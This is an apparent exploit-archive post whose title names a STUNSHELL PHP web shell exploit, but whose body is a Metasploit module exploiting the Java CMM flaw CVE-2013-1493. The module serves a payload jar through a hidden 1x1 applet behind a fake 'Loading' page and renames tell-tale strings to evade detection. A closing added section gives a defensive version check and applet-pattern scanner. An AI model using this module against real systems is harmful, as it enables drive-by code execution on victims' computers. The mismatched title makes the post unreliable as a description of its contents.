STUNSHELL PHP Web Shell Remote Code Execution

Posted on 2013-4-4 17:31:17
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
          This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',     # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch' => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  def setup
    # Pre-built applet classes shipped with the framework under data/exploits/cve-2013-1493
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    # Randomize the entry class name (same length, so the class bytes stay valid)
    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      # Rename the tell-tale "metasploit"/"Payload" strings in the jar entries
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end

end
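Added example, not part of the original post or of the Metasploit module above: a small Ruby triage helper for the exposure the module describes. It parses a Java version string (the `1.7.0_15` form from `java -version`, the `7u15` marketing form, or a `Java/1.7.0_17` plugin User-Agent fragment) and decides whether it falls in the affected range the module lists (7u15 and earlier, 6u41 and earlier), and it scans an HTML body for the loader pattern the module's generate_html emits (a 1x1 applet whose archive is a .jar). The sample HTML and version strings are constructed for this example; the function names are mine.

```ruby
# Added example (not the module's own code): triage helpers for CVE-2013-1493.

# Parse "1.7.0_15", "1.6.0_41", "7u15" or "Java/1.7.0_17" into [major, update].
# Returns nil when the string carries no recognizable Java version.
def parse_java_version(str)
  if str =~ /(?:^|\D)1\.([5-8])\.0(?:_(\d+))?/   # legacy "1.x.0_uu" form
    return [$1.to_i, ($2 || 0).to_i]
  elsif str =~ /(?:^|\D)([5-8])u(\d+)(?:\D|$)/   # marketing "7u15" form
    return [$1.to_i, $2.to_i]
  end
  nil
end

# Last affected update per major release, as stated in the module description
# (Oracle shipped the fix as 7u17 and 6u43).
LAST_AFFECTED = { 7 => 15, 6 => 41 }.freeze

# True when the version is inside the range the module describes as affected.
# Majors the description does not mention (5, 8) return false: no claim is
# made about them here (assumption of this example).
def affected_by_cve_2013_1493?(version_str)
  major, update = parse_java_version(version_str)
  return false if major.nil?
  last = LAST_AFFECTED[major]
  return false if last.nil?
  update <= last
end

# Scan an HTML body for <applet> elements that look like the module's loader:
# a .jar archive and a 1x1 display size. Returns one hash per hit.
def find_suspicious_applets(html)
  html.scan(/<applet\b([^>]*)>/i).flatten.map do |attrs|
    attr = lambda { |name| attrs[/\b#{name}\s*=\s*["']?([^"'\s>]+)/i, 1] }
    { archive: attr.call('archive'), code: attr.call('code'),
      width: attr.call('width'), height: attr.call('height') }
  end.select do |a|
    a[:archive].to_s =~ /\.jar\z/i && a[:width] == '1' && a[:height] == '1'
  end
end

# Constructed sample: what a victim's browser receives from the module's "/"
# handler (the jar and class names are random in the real thing).
SAMPLE_HTML = '<html><head><title>Loading, Please Wait...</title></head>' \
  '<body><center><p>Loading, Please Wait...</p></center>' \
  '<applet archive="QtPLrkZq.jar" code="Xbqm.class" width="1" height="1">' \
  '</applet></body></html>'

# A benign applet page for contrast (constructed).
BENIGN_HTML = '<html><body><applet archive="game.jar" code="Game.class" ' \
  'width="640" height="480"></applet></body></html>'

if __FILE__ == $0
  %w[1.7.0_15 1.7.0_17 1.6.0_41 1.6.0_43 7u15 Java/1.7.0_21 1.8.0_05].each do |v|
    puts "#{v}: #{affected_by_cve_2013_1493?(v) ? 'affected' : 'not affected'}"
  end
  find_suspicious_applets(SAMPLE_HTML).each { |a| puts "suspicious applet: #{a.inspect}" }
  puts "benign page hits: #{find_suspicious_applets(BENIGN_HTML).length}"
end
```

The version check is deliberately strict about the major release: a string it cannot parse, or a major the description says nothing about, is reported as not affected rather than guessed at, so a false "not affected" is possible for odd version formats and should be read alongside the raw string. The applet scan is a triage heuristic for captured responses, not a signature; the randomized jar and class names mean the only stable features are the element shape and the 1x1 size.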